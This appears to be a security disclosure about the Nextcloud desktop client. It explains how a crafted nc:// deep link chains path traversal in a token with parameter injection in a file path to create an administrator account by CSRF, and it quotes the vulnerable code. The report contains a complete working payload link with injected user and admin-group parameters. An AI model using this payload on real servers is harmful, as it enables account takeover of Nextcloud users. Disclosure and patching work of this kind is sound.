It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. (e.g. in an email, chat link, etc)
This vulnerability was introduced in an attempt to fix #1720043. The patch however can be bypassed and also introduced a CSRF vulnerability.
The following reproduction steps send a OCS API request to the /ocs/v1.php/cloud/users
endpoint with the following post body: path=/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log
. If the victim is not an administrator, one would need to target another controller.
nc://open/[email protected]/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log?token=../../../../../../../ocs/v1.php/cloud/users
The attempt to fix #1720043 was done with https://github.com/nextcloud/desktop/pull/5055 and introduced the following code:
const auto checkTokenForEditLocally = new SimpleApiJob(accountFound->account(), QStringLiteral("/ocs/v2.php/apps/files/api/v1/openlocaleditor/%1").arg(token));
checkTokenForEditLocally->setVerb(SimpleApiJob::Verb::Post);
checkTokenForEditLocally->setBody(QByteArray{"path=/"}.append(relPath.toUtf8()));
There are two vulnerabilities here that can be chained together:
token
is concatenated directly into the URL and not properly encoded. Passing a token
such like ?token=../../../../../../../ocs/v1.php/cloud/users
will make the request therefore go to /ocs/v2.php/apps/files/api/v1/openlocaleditor/../../../../../../../ocs/v1.php/cloud/users
which means /ocs/v1.php/cloud/users
.relPath
is concatenated directly into the POST body and not properly encoded. Passing a path such as .\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log
will therefore create several request POST parameters. (Note: ./owncloudsync.log
is a default file which I use here to ensure the file exists check earlier in the code works)Please note that all bugs reported by Authentick GmbH will be publicly disclosed within 90 days of vendor notification. In extraordinary cases we may increase that upon request by the vendor.
It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. (e.g. in an email, chat link, etc)